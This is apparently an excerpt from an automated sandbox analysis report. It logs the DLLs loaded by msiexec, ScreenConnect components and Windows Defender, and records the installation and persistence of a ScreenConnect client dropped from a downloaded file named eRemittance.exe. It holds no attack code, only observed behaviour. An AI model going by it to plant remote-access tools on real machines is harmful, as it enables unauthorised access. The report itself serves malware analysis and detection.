                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: version.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: version.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: amsi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: msasn1.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: gpapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rasapi32.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rasman.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rtutils.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: winhttp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ntmarta.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\InProcServer32
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Downloads\eRemittance.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

                      Persistence and Installation Behavior

                      barindex
                      Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE23F.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dllJump to dropped file
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\f49206ce-ea0b-4935-a632-940cd5b31daf.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID83C.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dllJump to dropped file
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\Unconfirmed 376437.crdownloadJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE23F.tmpJump to dropped file
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (484f9eed1d8e13b9)
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
